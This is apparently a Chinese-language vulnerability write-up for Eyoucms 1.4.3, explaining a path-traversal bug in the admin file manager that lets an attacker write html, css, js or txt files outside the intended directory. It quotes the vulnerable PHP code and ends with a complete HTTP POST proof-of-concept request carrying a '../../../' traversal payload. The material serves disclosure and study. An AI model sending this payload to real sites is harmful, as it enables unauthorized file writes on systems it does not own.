Eyoucms 1.4.3 任意文件写入¶
一、漏洞简介¶
可写入html,css,js,txt文件,总体来说比较鸡肋。
二、漏洞影响¶
Eyoucms 1.4.3
三、复现过程¶
漏洞分析
漏洞点只对filename进行过滤,而忘了activepath也可以../
进行跳转 application/admin/controller/Filemanager.php
if (IS_POST) {
$post = input('post.', '', null);
$content = input('post.content', '', null);
$filename = !empty($post['filename']) ? trim($post['filename']) : '';
$content = !empty($content) ? $content : '';
$activepath = !empty($post['activepath']) ? trim($post['activepath']) : '';
... ...
$r = $this->filemanagerLogic->editFile($filename, $activepath, $content);
if ($r === true) {
$this->success('操作成功!', url('Filemanager/index', array('activepath'=>$this->filemanagerLogic->replace_path($activepath, ':', false))));
exit;
} else {
... ...
跟进editFile函数
application/admin/logic/FilemanagerLogic.php
public function editFile($filename, $activepath = '', $content = '')
{
$fileinfo = pathinfo($filename);// pathinfo获取后缀
$ext = strtolower($fileinfo['extension']);
......
/*允许编辑的文件类型*/
if (!in_array($ext, $this->editExt)) { //<<<<<基于白名单,暂时没有想到绕过的方法>>>>>
return '只允许操作文件类型如下:'.implode('|', $this->editExt);
}
/*--end*/
$filename = str_replace("..", "", $filename);// 仅对filename进行过滤
$file = $this->baseDir."$activepath/$filename"; // 此处直接拼接产生漏洞
if (!is_writable(dirname($file))) {
return "请把模板文件目录设置为可写入权限!";
}
if ('css' != $ext) {
$content = htmlspecialchars_decode($content, ENT_QUOTES);
$content = preg_replace("/(@)?eval(\s*)\(/i", 'intval(', $content);//
// $content = preg_replace("/\?\bphp\b/i", "?muma", $content);
}
$fp = fopen($file, "w");
fputs($fp, $content);
fclose($fp);
return true;
}
漏洞复现¶
poc
POST /eyoucms/login.php?m=admin&c=Filemanager&a=newfile&lang=cn HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 94
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/eyoucms/login.php?m=admin&c=Filemanager&a=newfile&activepath=%3Atemplate%3Aplugins%3Atest&lang=cn
Cookie: home_lang=cn; admin_lang=cn; PHPSESSID=h6k34lgf1svcatllongehqqdt0; workspaceParam=index%7CFilemanager; XDEBUG_SESSION=18705
Upgrade-Insecure-Requests: 1
activepath=%2Ftemplate%2Fplugins%2Ftest/../../../uploads/tmp&filename=newfile.htm&content=test